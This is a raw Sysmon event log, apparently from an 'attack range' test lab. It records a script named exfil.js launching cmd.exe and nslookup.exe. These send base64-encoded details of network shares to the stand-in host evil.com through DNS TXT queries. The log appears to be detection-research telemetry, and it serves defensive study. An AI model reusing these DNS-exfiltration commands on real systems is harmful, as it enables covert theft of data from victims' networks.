14:21:44.294{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6745-000000005F02}4348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.294{2E1864BB-18E0-629A-6742-000000005F02}39764232C:\Windows\System32\WScript.exe{2E1864BB-18F8-629A-6745-000000005F02}4348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.304{2E1864BB-18F8-629A-6745-000000005F02}4348C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlozh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.294{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldukbqiy.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.272{2E1864BB-18F8-629A-6545-000000005F02}73565980C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-6645-000000005F02}7388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.257{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.257{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.257{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.257{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.257{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6645-000000005F02}7388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.257{2E1864BB-18F8-629A-6445-000000005F02}34448108C:\Windows\system32\cmd.exe{2E1864BB-18F8-629A-6645-000000005F02}7388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.269{2E1864BB-18F8-629A-6645-000000005F02}7388C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F8-629A-6445-000000005F02}3444C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldukbqiy.tmp 2>&1 10341000x8000000000000000213214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.241{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-6545-000000005F02}7356C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.241{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-6545-000000005F02}7356C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.241{2E1864BB-18F8-629A-6545-000000005F02}73565980C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-6445-000000005F02}3444C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.226{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6545-000000005F02}7356C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.226{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.226{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.226{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.226{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.226{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6445-000000005F02}3444C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.226{2E1864BB-18E0-629A-6742-000000005F02}39767784C:\Windows\System32\WScript.exe{2E1864BB-18F8-629A-6445-000000005F02}3444C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.228{2E1864BB-18F8-629A-6445-000000005F02}3444C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldukbqiy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.210{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlruauw.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.194{2E1864BB-18F8-629A-6245-000000005F02}65607208C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-6345-000000005F02}1368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.194{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.194{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.194{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.194{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.194{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6345-000000005F02}1368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.194{2E1864BB-18F8-629A-6145-000000005F02}69282172C:\Windows\system32\cmd.exe{2E1864BB-18F8-629A-6345-000000005F02}1368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.203{2E1864BB-18F8-629A-6345-000000005F02}1368C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F8-629A-6145-000000005F02}6928C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlruauw.tmp 2>&1 